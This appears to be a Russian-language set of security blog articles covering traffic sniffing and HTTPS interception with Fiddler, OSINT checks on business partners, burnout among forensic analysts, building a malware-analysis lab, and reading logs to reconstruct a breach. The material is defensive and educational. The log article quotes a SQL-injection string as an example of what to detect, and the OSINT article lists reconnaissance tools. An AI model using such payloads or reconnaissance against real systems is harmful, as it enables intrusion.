• Fiddler или Charles. Это инструменты другого класса. Они работают как прокси-серверы между вашими приложениями и интернетом. Их главная фишка — работа с веб-трафиком, особенно с HTTPS. Если Wireshark просто видит зашифрованный поток, то эти ребята умеют его расшифровывать (с вашего разрешения, конечно), чтобы вы могли покопаться в запросах от браузера или мобильных приложений.

Пошаговая инструкция для начинающего потрошителя
Возьмем для примера Wireshark как самый наглядный инструмент.
1. Подготовка. Скачайте и установите Wireshark. Запустите. Вас встретит список сетевых интерфейсов: Wi-Fi, Ethernet и куча других непонятных названий. Ваша задача — выбрать тот, через который вы подключены к интернету. Обычно рядом с ним будет виден график активности. Дважды кликните по нему.
2. Захват. Поздравляю, вы начали захват. На экране со скоростью света побегут строки. Это и есть ваш трафик. Пока что это похоже на цифровой хаос, но не паникуйте. Процесс пошел. Дайте программе поработать минуту-две, а затем нажмите красную кнопку «Стоп».
3. Фильтрация: отделяем зерна от плевел. Вся магия — в фильтрах. Без них вы утонете в данных. В строке Apply a display filter наверху можно писать простые команды, чтобы отсеять лишнее.
• Хотите посмотреть, куда стучится ваш телефон? Узнайте его IP-адрес (в настройках сети Wi-Fi) и введите фильтр: ip.addr == 192.168.1.42.
• Интересно, какие сайты запрашивают ваши устройства? Введите фильтр dns. Вы удивитесь, как часто ваш телевизор или игровая консоль что-то ищут в сети.
• Хотите увидеть незашифрованный веб-трафик? Фильтр http. Его будет мало, но иногда проскакивают интересные вещи от старых сайтов или IoT-устройств.
4. Анализ. Нашли интересный пакет? Кликните по нему правой кнопкой мыши и выберите Follow > TCP Stream. Wireshark соберет все пакеты этого соединения в один диалог и покажет вам «разговор» двух устройств. Если трафик не зашифрован (например, старый добрый HTTP), вы увидите все в виде простого текста.

А что с HTTPS?
Да, почти весь современный интернет работает через HTTPS, и это хорошо. Wireshark покажет вам, что соединение установлено, но его содержимое будет выглядеть как бессмысленная каша. Вскрыть его «на лету» без приватных ключей сервера невозможно.
Именно здесь на сцену выходят Fiddler или Charles. Они устанавливают на ваш компьютер свой корневой сертификат (вы должны это подтвердить). После этого они прогоняют трафик через себя, расшифровывают его, показывают вам, а затем снова зашифровывают и отправляют дальше. Это называется атакой «человек посередине» (MITM), но в данном случае вы сами себе и человек, и середина. Так вы можете увидеть, какие именно данные ваше любимое мобильное приложение отправляет своим создателям.
Что можно нарыть?
• Увидеть, что ваш новенький умный пылесос каждые 5 минут отправляет данные на серверы в Алибаба-клауд.
• Обнаружить, что бесплатная игра на телефоне собирает список всех приложений, установленных на устройстве.
• Поймать за руку вредоносную программу, которая пытается соединиться со своим командным центром.
• Выяснить, какое именно устройство в вашей сети «съедает» всю скорость, бесконечно скачивая обновления.
Так что, баловаться анализом трафика — это не паранойя. Это цифровая гигиена. Теперь вы знаете, как заглянуть в бездну. Главное — помните: если вы долго смотрите в бездну, бездна начинает смотреть в вас. И не звоните мне, когда обнаружите, что ваш холодильник подписался на платные сервисы. Я предупреждал.

Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него

OSINT для бизнеса: как легально «пробить» конкурента, партнёра или инвестора

Окей, предприниматель, садись поудобнее. Сейчас я научу тебя тому, что крупные корпорации делают через целые отделы безопасности, а ты будешь делать сам. OSINT для бизнеса — это не шпионаж из фильмов про Джеймса Бонда, это методичная работа с открытыми данными. Легально, эффективно и чертовски полезно, когда решаешь: вкладывать ли миллион в стартап или этот “перспективный партнёр” на самом деле банкрот с тремя судимостями.

Зачем это вообще нужно

Потому что красивая презентация и крепкое рукопожатие — это не due diligence. В реальном мире:

  • 70% стартапов приукрашивают показатели инвесторам
  • Конкуренты часто нарушают твои патенты, пока ты спишь
  • Партнёры могут иметь долги больше, чем стоимость сделки
  • Потенциальные сотрудники врут в резюме чаще, чем политики в предвыборных обещаниях

OSINT — это твоя страховка от дорогих ошибок.

Юридические границы (читай внимательно)

Прежде чем ты полезешь куда не надо, запомни железное правило: всё, что ты делаешь, должно быть легально. Это значит:

Можно:

  • Публичные базы данных и реестры
  • Социальные сети и открытые профили
  • Судебные решения и банкротства
  • Корпоративные отчётности
  • Новостные статьи и пресс-релизы
  • Вакансии компаний (да, они раскрывают стратегию)

Нельзя:

  • Взламывать аккаунты и системы
  • Подкупать инсайдеров
  • Использовать pretexting (выдавать себя за другого)
  • Получать закрытые финансовые данные незаконно
  • Устанавливать слежку или прослушку

Нарушишь — получишь не конкурентное преимущество, а уголовное дело. Я серьёзно.

Проверка конкурента: пошаговый алгоритм

Этап 1: Корпоративная археология

Начни с базы. В России это ЕГРЮЛ/ЕГРИП, выписки из налоговой, картотека арбитражных дел. Ищешь:

  • Реальных бенефициаров (не номинальных директоров)
  • Связанные компании через учредителей
  • Судебные споры (особенно с налоговой и контрагентами)
  • Историю смены руководства (частая смена = красный флаг)

Этап 2: Цифровой след

Сайт конкурента — золотая жила. Используй:

  • Wayback Machine — смотри, как менялся сайт. Убрали раздел с крупным клиентом? Потеряли его.
  • Whois-история — когда регистрировались домены, кто владелец.
  • Вакансии — ищут юриста по M&A? Готовятся к поглощению. Массовый набор программистов? Разрабатывают новый продукт.

Социальные сети руководства:

  • LinkedIn — связи, переходы, рекомендации (и отсутствие таковых)
  • Facebook/VK — личные посты (люди удивительно откровенны)
  • Twitter/X — публичные заявления и реакции

Этап 3: Технологический разбор

Если конкурент IT-компания:

  • BuiltWith — какие технологии используют на сайте
  • Ghostery — какие трекеры и аналитика
  • GitHub — открытые репозитории сотрудников (иногда сливают код случайно)
  • App stores — отзывы, обновления, статистика загрузок

Проверка потенциального партнёра

Здесь ставки выше — ты рискуешь репутацией и деньгами.

Финансовое здоровье:

  • Бухгалтерская отчётность (для ООО — обязательна к публикации)
  • Реестр залогового имущества (закладывали активы?)
  • Исполнительные производства (долги перед кем угодно)
  • Кредитная история компании (через специализированные БД)

Репутационный анализ:

  • Поиск упоминаний в негативном контексте
  • Отзывы бывших сотрудников на HeadHunter, Glassdoor
  • Жалобы на форумах и в Роспотребнадзоре
  • Проверка владельцев через Росфинмониторинг (причастность к терроризму/экстремизму)

Связи и окружение:

  • С кем ещё работают/работали
  • Есть ли связи с санкционными списками
  • Участие в сомнительных схемах (дробление бизнеса, обналичка)

Проверка инвестора (да, их тоже надо проверять)

Инвестор с грязными деньгами — это бомба замедленного действия под твоим бизнесом.

Источник капитала:

  • История предыдущих инвестиций (успешные exits или провалы?)
  • Откуда деньги (наследство, бизнес, непонятные источники?)
  • Связи с криминалом или коррупционными схемами

Поведенческий паттерн:

  • Как ведут себя в портфельных компаниях (ищи интервью основателей)
  • Частота смены проектов (импульсивность = проблема)
  • Публичная репутация и медиа-присутствие

Инструменты, которые сделают тебя опасным

Бесплатные:

  • Google Dorks — продвинутый поиск (site:, filetype:, intitle:)
  • Maltego — визуализация связей (community edition)
  • TheHarvester — сбор email, доменов, имён
  • Shodan — поиск устройств и уязвимостей в инфраструктуре
  • FOCA — метаданные из документов

Платные (но того стоят):

  • SparkToru — анализ аудитории конкурентов
  • SimilarWeb — трафик и стратегия конкурентов
  • Crunchbase Pro — инвестиции и финансы стартапов
  • СПАРК-Интерфакс — российские компании в деталях

Практические кейсы

Кейс 1: Спасённая сделка

Клиент хотел купить долю в “перспективной” логистической компании. За 30 минут OSINT показал: три банкротства связанных фирм за последние 2 года, долги по зарплате, иск от ФНС на 15 млн. Сделка сорвалась, клиент сэкономил деньги и нервы.

Кейс 2: Раскрытая стратегия

Анализ вакансий конкурента показал массовый набор специалистов по работе с Китаем. Через месяц они анонсировали выход на азиатский рынок. Мой клиент успел первым.

Автоматизация и масштабирование

Если проверяешь регулярно, настрой мониторинг:

  • Google Alerts — на имена конкурентов и ключевые слова
  • Mention — отслеживание упоминаний в соцсетях
  • Visualping — мониторинг изменений на сайтах
  • Собственные скрипты на Python (парсинг реестров, новостей)

Этика и долгосрочная игра

Да, ты можешь узнать много грязи. Но помни:

  • Используй информацию для защиты, не для шантажа
  • Не распространяй личные данные публично
  • Сохраняй доказательства легально (скриншоты с датами, архивы)

Репутация в бизнесе — это валюта. Будешь палить конкурентов грязными методами — сам станешь мишенью.

Заключение

OSINT для бизнеса — это не параноя, это профессиональная гигиена. В мире, где информация стоит дороже нефти, умение её собирать и анализировать — конкурентное преимущество. Но играй честно, играй легально, и пусть твои конкуренты гадают, откуда ты всё знаешь.

Теперь иди и проверь того “надёжного партнёра”, который обещал золотые горы. Спорим, найдёшь что-то интересное?

OSINT для бизнеса: как легально «пробить» конкурента, партнёра или инвестора

Психология цифрового сыщика: как не сойти с ума, копаясь в чужих секретах

Слушай, я видел достаточно людей, которые сгорели на этой работе быстрее, чем пароли на “123456” взламываются. Форензика и OSINT — это не просто технические навыки. Это марафон по чужим скелетам в шкафу, где твоя психика — главный инструмент. И если не научишься её обслуживать, выгоришь как спичка. Давай разберемся, как остаться в адеквате, когда твоя работа — копаться в самом темном контенте интернета.

Почему это действительно проблема

Забудь романтику про хакеров из фильмов. Реальность форензика — это:

  • Детская порнография в изъятых устройствах
  • Сцены насилия в переписках маньяков
  • Финансовые махинации, где страдают тысячи людей
  • Переписки жертв перед трагедиями

Ты не просто смотришь на данные — ты пропускаешь через себя человеческую мерзость в концентрированном виде. ПТСР среди цифровых следователей — не исключение, а статистическая норма.

Основные психологические ловушки

Эмоциональное выгорание

Когда каждый день начинается с просмотра доказательств преступлений, мозг включает защиту — эмоциональное отупение. Звучит как решение? Нет, дружище. Это начало конца. Ты перестаешь чувствовать не только на работе, но и дома.

Параноидальное мышление

После года в OSINT начинаешь видеть угрозы везде. Каждый незнакомец в кафе — потенциальный преступник, каждая камера наблюдения — часть слежки. Я знал парня, который заклеил все камеры в доме и спал с ноутбуком в сейфе.

Синдром самозванца наоборот

Когда ты раскрываешь кейсы, которые другие не смогли, появляется опасное чувство всемогущества. “Я бог киберпространства” — думаешь ты, пока не столкнешься с кейсом, который не решается месяцами.

Как выживать и процветать

Эмоциональная гигиена (не смейся, это серьезно)

  • Жесткие границы между работой и домом. Рабочий ноутбук остается на работе.
  • Регулярная терапия. Найди психолога, который понимает специфику. Нет, твоя девушка не подойдет.
  • Дебрифинг после тяжелых кейсов. Проговаривай с коллегами, что видел.

Технические ритуалы

  • Используй виртуальные машины для грязной работы. Психологически помогает создать “защитный слой”.
  • Меняй обстановку. Разные типы кейсов — разные места работы.
  • Таймеры. 45 минут работы с тяжелым контентом — 15 минут на что угодно другое.

Физическая разрядка

Твой мозг перегружен? Перегрузи тело. Спортзал, бег, что угодно, где можно выпустить пар. Я знаю, звучит банально, но это работает лучше, чем пятая чашка кофе в 2 часа ночи.

Этические ориентиры как якорь

Когда видишь слишком много дерьма, легко скатиться в цинизм или, что хуже, начать получать удовольствие от процесса поиска. Помни:

  • Ты не судья, ты следователь.
  • Жертвы реальны, даже если ты видишь только цифровые следы.
  • Конфиденциальность — не просто юридическое требование, это твой моральный компас.

Признаки того, что пора взять паузу

  • Кошмары с элементами кейсов.
  • Постоянное чувство усталости, даже после сна.
  • Потеря интереса к хобби и близким.
  • Агрессия на пустом месте.
  • Навязчивые мысли о работе в свободное время.

Если три из пяти — бери отпуск. Не героизм, а самосохранение.

Построение поддерживающей среды

Одиночка в форензике долго не протянет. Тебе нужны:

  • Коммьюнити — форумы, чаты, конференции, где можно говорить с теми, кто понимает.
  • Наставник — кто-то, кто прошел через это и может дать совет без осуждения.
  • Хобби вне IT — что-то, где нет экранов и данных.

Заключение

Форензика — это не спринт, это ультрамарафон по минному полю. Твои технические навыки стоят ноль, если психика не выдержит. Береги голову так же, как шифруешь данные. И помни: просить помощи — не слабость, а признак профессионализма.

Теперь возвращайся к своим кейсам, но с пониманием: ты не машина для обработки данных, ты человек. И это твое главное преимущество.

Психология цифрового сыщика: как не сойти с ума, копаясь в чужих секретах

Анатомия вредоноса: разбираем вирус на запчасти в безопасной лаборатории

Знаешь, что общего между хирургом и малвар-аналитиком? Оба вскрывают объекты, чтобы понять, что внутри. Только хирург спасает жизни, а мы — предотвращаем цифровой апокалипсис. Вредоносное ПО — это не просто «плохой файлик», это инженерное произведение, созданное для обхода защиты, кражи данных или шантажа. И если ты думаешь, что можно просто запустить подозрительный .exe на рабочем компе и посмотреть, что будет — поздравляю, ты кандидат на премию Дарвина в IT . Поэтому сегодня разберём, как правильно препарировать вредонос в безопасной лаборатории, чтобы понять его анатомию, не угробив при этом свою инфраструктуру.

Зачем вообще разбирать малвар

Прежде чем запачкать руки, давай разберёмся: зачем тебе ковыряться в чужом коде, написанном криминальным гением (или скрипт-кидди, что вероятнее)? Причин несколько, и все они железобетонные.

Обнаружение и митигация угроз — когда антивирус орёт «ОПАСНОСТЬ!», но не говорит, что именно файл делает, тебе придётся разбираться самому. Анализ показывает, какие индикаторы компрометации (IOC) нужно блокировать: IP-адреса, домены, хеши файлов, мутексы.

Инцидент-респонс — компания взломана, ransomware зашифровал данные, а ты должен понять: как именно вредонос проник, что он сделал и как предотвратить повторение. Без разбора малвара ты просто тушишь пожар, не зная, откуда он начался.

Threat hunting — анализ вредоноса даёт артефакты (обращения к конкретным доменам, портам, модификации реестра), по которым можно искать похожую активность в логах SIEM. Нашёл один образец — выловил всю кампанию.

Исследование — если ты малвар-исследователь или просто любопытный извращенец, то изучение новейших техник обфускации, эксплойтов и методов обхода песочниц — это твоя ежедневная диета.

Типы анализа: статика, динамика и гибрид

Разбирать вредонос можно по-разному, в зависимости от того, насколько глубоко ты готов копать (и сколько времени у тебя есть до того, как директор ворвётся с вопросом «ну и что там?»).

Статический анализ: смотрим, но не трогаем

Статический анализ — это когда ты изучаешь файл, не запуская его. Открываешь в дизассемблере, смотришь на строки (strings), хеши, заголовки, импортируемые библиотеки. Это как вскрытие трупа: ты можешь увидеть причину смерти, но не увидишь, как человек ходил при жизни.

Что можно выяснить: имя файла, хеш (MD5, SHA256), упаковщики (UPX, Themida), встроенные IP-адреса, URL, строки типа «admin123» или «C:\Windows\System32\evil.dll». Инструменты: PEiD, strings, IDA Pro, Ghidra.

Минус: современный малвар умеет прятаться. Обфускация, шифрование строк, динамическая генерация URL — всё это статика не увидит, потому что код не выполняется . Например, если вредонос генерирует адрес C2-сервера в рантайме, статический анализ его пропустит.

Динамический анализ: запускаем в клетке

Динамический анализ — это когда ты запускаешь вредонос в песочнице (sandbox) и смотришь, что он делает. Sandbox — это изолированная виртуальная среда, где малвар может бушевать, сколько влезет, не нанося вреда реальной системе. Это как зоопарк: тигр может рычать и кусаться, но клетка его удержит.

Что можно увидеть: изменения в файловой системе, реестре, сетевую активность, запущенные процессы, инъекции в память, попытки подключения к C2-серверам. Инструменты: Cuckoo Sandbox, ANY.RUN, CrowdStrike Falcon Sandbox, Joe Sandbox.

Минус: хакеры не дураки. Они знают про песочницы и добавляют в малвар проверки на их наличие. Вредонос может проверить: количество процессорных ядер (в VM их меньше), объём RAM, наличие виртуальных драйверов (VirtualBox, VMware), даже движение мыши. Если обнаружит песочницу — просто уснёт и притворится безобидным файлом. Умно, мерзавцы.

Гибридный анализ: лучшее из двух миров

Гибридный анализ — это когда ты комбинируешь статику и динамику . Запускаешь вредонос, смотришь, что он делает, а потом применяешь статический анализ к данным, которые малвар сгенерировал в памяти или на диске. Например, вредонос распаковал в памяти зашифрованный пейлоад — ты делаешь дамп памяти и разбираешь его в дизассемблере.

Это золотой стандарт, потому что позволяет обойти антисандбокс-трюки и извлечь максимум IOC. Falcon Sandbox от CrowdStrike, например, использует именно гибридный подход и может детектировать даже zero-day эксплойты.

Собираем безопасную лабораторию

Теперь конкретика: как построить свою малвар-лабораторию, чтобы не взорвать нафиг всю домашнюю сеть и не стать героем новостей «хакер случайно заразил город».

Изоляция — святой Грааль безопасности

Первое правило малвар-лаборатории: полная изоляция от внешнего мира и твоей основной сети. Никаких мостов, никаких общих папок, никакого «я просто быстренько на минутку». Используй отдельную физическую машину или VM с Host-Only сетью (без доступа в интернет).

Если нужно проверить, как вредонос общается с C2-сервером, настрой INetSim или FakeNet-NG — это эмуляторы сетевых сервисов, которые будут притворяться интернетом. Малвар попытается подключиться к evil.com? Отлично, FakeNet ответит ему, и ты увидишь, что именно вредонос отправляет.

Виртуализация: твой лучший друг

Используй VirtualBox или VMware Workstation. Создай несколько снапшотов (snapshot) чистой системы (Windows 7/10/11, Linux), чтобы после каждого запуска малвара можно было откатиться к первозданному состоянию . Это как кнопка «Ctrl+Z» для всей ОС.

Важно: настрой VM так, чтобы она выглядела максимально реалистично для вредоноса. Установи обычные программы (браузер, Office), создай фейковые файлы пользователя, измени MAC-адрес сетевой карты. Малвар может проверять, установлены ли обои на рабочем столе или есть ли история браузера — если нет, он решит, что это песочница, и притворится мёртвым.

Инструментарий для вскрытия

Вот минимальный набор, который должен быть в арсенале:

Статический анализ: IDA Pro (дорого, но мощно), Ghidra (бесплатно от NSA, да-да, от тех самых), PEiD (определение упаковщиков), strings (показывает текстовые строки в бинарнике), VirusTotal (загрузить хеш, посмотреть, что думают 70+ антивирусов) .

Динамический анализ: Process Monitor (мониторинг файловой системы и реестра), Process Hacker (анализ процессов и памяти), Wireshark (перехват сетевого трафика), Regshot (сравнение состояния реестра до/после запуска), Cuckoo Sandbox (автоматизированная песочница) .

Дебаггеры: x64dbg/OllyDbg (для пошаговой отладки кода), WinDbg (для анализа крашей и kernel-mode малвара).

Эмуляция сети: FakeNet-NG, INetSim (чтобы вредонос думал, что он в интернете).

Пошаговый разбор: от файла до истины

Допустим, тебе на почту прилетел подозрительный файл invoice.exe. Что делаешь?

Шаг 1: Статическая разведка

Не запускай файл! Сначала посмотри на него издалека. Проверь хеш на VirusTotal — возможно, его уже кто-то анализировал. Открой в HEX-редакторе, посмотри на заголовок (PE-файл должен начинаться с MZ). Запусти strings invoice.exe — может, там торчат IP-адреса, домены, пароли.

Загрузи в IDA Pro или Ghidra, посмотри на импортируемые функции. Видишь VirtualAlloc, CreateRemoteThread, WriteProcessMemory? Это признаки process injection (инъекция кода в другой процесс). Видишь InternetOpenA, HttpSendRequest? Малвар будет общаться с сетью.

Шаг 2: Запуск в песочнице

Загрузи VM, сделай снапшот, запусти Process Monitor, Wireshark, Regshot (сделай первый снимок реестра). Теперь запускай invoice.exe и смотри в оба.

Process Monitor покажет, какие файлы создаются/изменяются, какие ключи реестра трогаются. Wireshark перехватит сетевой трафик — вредонос попытается подключиться к C2? Запиши IP/домен. Regshot сделай второй снимок и сравни — увидишь, что малвар добавил себя в автозагрузку через HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

Шаг 3: Анализ поведения в памяти

Современный малвар часто распаковывается в памяти, чтобы статический анализ его не поймал. Используй Process Hacker или Volatility Framework для дампа памяти процесса. Потом открой дамп в IDA Pro и анализируй распакованный код.

Ищи артефакты: строки с командами C2-сервера, ключи шифрования, логику работы. Может, найдёшь хардкоженный URL для exfiltration данных или криптовалютный кошелёк для ransomware.

Шаг 4: Извлечение IOC и документирование

Соберите все индикаторы компрометации: хеши файлов, домены, IP-адреса, мутексы (mutex — уникальный идентификатор, который малвар создаёт, чтобы не запуститься дважды), изменения в реестре. Эти данные можно загрузить в SIEM, TIP (Threat Intelligence Platform) или MISP для автоматического блокирования и алертинга.

Задокументируй всё: какие техники использовал вредонос (по фреймворку MITRE ATT&CK), как он обходил защиту, что было его целью. Это пригодится для отчёта, для коллег, для правоохранителей.

Антиэвазия: как обмануть хитрого вредоноса

Малвар-авторы — ушлые ребята. Они знают, что их творения будут анализировать, поэтому добавляют anti-analysis трюки. Вот как с ними бороться:

Проверка на VM: вредонос смотрит на CPUID, драйверы, реестр. Решение — используй bare-metal машину (физическое железо) или настрой VM так, чтобы она выглядела как обычный компьютер (измени BIOS ID, удали гостевые драйверы VMware/VirtualBox).

Sleep/Delay: малвар засыпает на час, чтобы переждать песочницу (у неё обычно таймаут 5-10 минут). Решение — ускорь время в VM или используй дебаггер, чтобы перепрыгнуть через Sleep-вызов.

Проверка на человека: вредонос проверяет, двигается ли мышь, есть ли активность клавиатуры. Решение — эмулируй пользовательскую активность скриптами или используй песочницы типа Falcon Sandbox, которые умеют обходить такие проверки.

Этика и легальность: не переходи на тёмную сторону

Последнее предупреждение: анализ малвара — это легальная деятельность, если ты делаешь это в своей изолированной среде для защиты или исследования. Но если ты возьмёшь и запустишь ransomware на чужом сервере «ради эксперимента» — это уже уголовка. Храни образцы вредоносов в зашифрованном виде (архив с паролем), не делись ими с кем попало, не используй для атак.

И ещё — некоторые вредоносы (например, wiper-малвар) могут попытаться выйти за пределы VM через уязвимости в гипервизоре (VM escape). Поэтому всегда держи систему виртуализации обновлённой и не подключай лабораторию к критичной инфраструктуре.

Заключение

Разбор вредоноса — это как детективное расследование, только вместо улик на месте преступления у тебя байты в памяти и пакеты в Wireshark. Ты берёшь подозрительный файл, запускаешь его в контролируемой среде, смотришь, как он живёт, дышит и пытается украсть твои данные. Статический анализ даёт первое впечатление, динамический показывает истинное лицо, а гибридный выдавливает из малвара всё до последней капли. Это сложно, это требует практики и терпения, но результат того стоит — ты получаешь полное досье на цифрового преступника, которое можно использовать для защиты, атрибуции и предотвращения будущих атак.

Теперь иди, построй свою лабораторию, достань образец малвара (с VirusTotal, MalwareBazaar или из карантина антивируса) и начинай практиковаться. Только помни: дважды проверь изоляцию, прежде чем что-то запускать. Я серьёзно. 🔬💀

Анатомия вредоноса: разбираем вирус на запчасти в безопасной лаборатории

Искусство чтения логов: как из гигабайтов мусора собрать историю взлома

Слушай, новичок (или притворяешься, что новичок?), если ты думаешь, что логи — это просто бесконечные строчки текста для галочки перед аудитором, то у меня для тебя плохие новости. Логи — это не мусор, это чёртова Библия киберпреступления, написанная языком TCP/IP, HTTP-запросов и потных ладоней атакующего. Каждая строка — это крошка хлеба, оставленная хакером по дороге к твоим серверам, и твоя задача — собрать их все, чтобы воссоздать историю взлома с точностью криминалиста.

Почему логи — твой лучший друг

Представь: компания взломана, директор орёт, заказчик требует отчёт за вчера, а у тебя на руках только 500 гигабайт сырых логов из файрвола, веб-сервера, Active Directory и чёрт знает откуда ещё. Паника? Нет. Это твой шанс блеснуть. Логи содержат всё: временные метки (timestamp — священный Грааль форензики), IP-адреса, коды ошибок, запросы к файлам, авторизации, отказы в доступе. Всё, что атакующий делал в системе, записано где-то там, в этой каше из символов. Главное — знать, где искать.

Логи не врут. Люди врут. Системы сбоят. А логи — это молчаливый свидетель, который помнит каждый шаг злоумышленника: первую попытку перебора паролей, успешную авторизацию через скомпрометированный аккаунт, латеральное движение по сети и финальный аккорд — эксфильтрацию данных.

С чего начать: сортировка мусора

Первое правило клуба анализа логов: не пытайся читать всё подряд. Серьёзно. Ты сойдёшь с ума раньше, чем найдёшь что-то полезное. Логи нужно сортировать, фильтровать и нормализовать — это как промывать золото из песка.

Централизация и нормализация

Собери все логи в одно место — SIEM (Security Information and Event Management) системы для этого и придуманы. Splunk, ELK Stack, CrowdStrike Falcon LogScale — выбирай, что душе угодно. Главное — чтобы данные из разных источников (файрволы, прокси, серверы, endpoints) попадали в единый формат. IP-адреса должны быть IP-адресами, а не «юзер с компа 192.168.какая-то-фигня» — понял?

Нормализация убирает каши из разных форматов логов (Cisco пишет одно, Windows другое) и превращает всё в структурированные данные, где можно искать по полям: source_ip, destination_port, user_agent, timestamp.

Фильтруй шум — метод искусственного игнорирования

Тут включается техника с идиотским названием «artificial ignorance» (искусственное игнорирование) — ты активно игноришь всё, что заведомо безопасно . Твой бухгалтер каждое утро в 9:00 заходит в 1С? Отлично, это фоновый шум. Скрипт делает бэкап каждый час? Тоже в список игнора. Остаётся только то, что не вписывается в паттерн — аномалии, необычные авторизации, запросы к редким путям, неожиданные передачи данных.

Как читать логи: ищем следы атаки

Теперь самое интересное — охота на хакера. Представь, что ты Шерлок Холмс, только вместо трубки у тебя RegEx-запросы, а вместо Ватсона — кофе и бессонница.

Временные метки — твоя путеводная звезда

Первое, что делаешь — выстраиваешь timeline (хронологию событий). Все действия в системе имеют timestamp, и твоя задача — найти первую точку компрометации (initial access). Это может быть успешная попытка входа после серии неудачных (brute force), странный логин в 3 часа ночи, подозрительный файл, загруженный через веб-форму.

Пример: смотришь лог веб-сервера Apache/Nginx — там десятки тысяч GET/POST-запросов. Но один из них — это не просто запрос к странице, а попытка SQL-инъекции: GET /index.php?id=1' OR '1'='1. Бинго. Дальше проверяешь, успешна ли была попытка (код ответа 200), и двигаешься вперёд по timeline.

Корреляция — сшивай разрозненные куски

Атака редко происходит через один источник. Хакер может зайти через VPN, прыгнуть на внутренний сервер, оттуда — на контроллер домена, а данные утащить через другой endpoint. Твоя задача — коррелировать события из разных логов.

Пример корреляции: в логах VPN видишь вход пользователя admin@company.com в 02:45. В логах контроллера домена (Windows Event ID 4624) — авторизация этого же юзера на DC в 02:47. В логах файлового сервера — массовая копирование файлов в 02:50. В логах файрвола — исходящее соединение на подозрительный IP в 03:15. Вуаля, у тебя полная картина атаки.

Паттерны и аномалии

Учись распознавать паттерны атак. Brute force — это сотни неудачных авторизаций за минуту. Lateral movement — это авторизации одного пользователя на разных машинах за короткий промежуток. Exfiltration — это необычно большой объём исходящего трафика.

А ещё лучше — используй machine learning для поиска аномалий. Современные SIEM умеют сами находить отклонения от нормального поведения — юзер вдруг скачал в 100 раз больше данных, чем обычно? Алгоритм зафиксирует.

Инструменты для тех, кто не любит читать вручную

Давай начистоту: вручную читать логи — это мазохизм. Используй инструменты, которые автоматизируют рутину.

Splunk — король SIEM-систем, дорогой, но мощный. Умеет всё: парсинг, корреляцию, визуализацию, алерты. Если у компании есть бюджет — бери его.

ELK Stack (Elasticsearch, Logstash, Kibana) — бесплатная альтернатива, требует настройки, но результат того стоит. Logstash собирает логи, Elasticsearch индексирует, Kibana рисует красивые дашборды.

CrowdStrike Falcon LogScale — новое поколение, без индексирования (это важно!), работает с петабайтами данных в реальном времени, поиск за доли секунды.

Grep, awk, sed — старая школа Unix. Если логи на Linux-сервере и нет SIEM, то эти утилиты — твоя первая линия обороны. Но серьёзно, в 2025 году пора уже использовать что-то современнее.

Реальный кейс: разбор взлома по логам

Представь: компания обнаружила утечку данных клиентов. Директор в панике, полиция на подходе. Тебе дали доступ к логам за последний месяц. Что делаешь?

Шаг 1: Ищешь точку входа. Проверяешь логи периметра (файрвол, VPN, веб-приложения). Находишь серию успешных авторизаций через VPN от пользователя, который якобы был в отпуске.

Шаг 2: Строишь timeline. Коррелируешь авторизацию VPN с действиями внутри сети. Видишь, что через 10 минут после входа юзер запросил доступ к базе данных клиентов, хотя раньше никогда этого не делал.

Шаг 3: Ищешь exfiltration. Проверяешь сетевой трафик — аномально большой объём данных ушёл на внешний IP в облаке (AWS, Azure). Копаешь глубже — это S3-bucket, зарегистрированный на левый аккаунт.

Шаг 4: Собираешь доказательства. Экспортируешь все релевантные логи, сохраняешь с хешами (MD5/SHA256), готовишь отчёт для юристов и правоохранителей.

Этика и легалити: не будь идиотом

Последнее, но важное. Логи — это юридически значимые доказательства. Если ты неправильно их собрал, изменил, или потерял цепочку custody (chain of custody), то в суде их могут не принять . Всегда документируй, кто, когда и как получил доступ к логам. Храни оригиналы. Используй write-once носители для архивации.

И ещё — не лезь в чужие системы без разрешения. Даже если ты форензик-бог, несанкционированный доступ — это уголовка. Я серьёзно.

Заключение

Чтение логов — это не магия, это методичная работа с данными, знание инструментов и понимание того, как думает атакующий. Ты берёшь гигабайты «мусора», применяешь фильтры, корреляцию, паттерны — и в итоге получаешь железобетонную историю взлома, которую можно положить на стол следователю или директору. Это искусство, которое требует практики, терпения и немалой доли цинизма.

Теперь иди и практикуйся. Только не на чужих серверах, ладно? 🔍💻

Искусство чтения логов: как из гигабайтов мусора собрать историю взлома
Оставьте заявку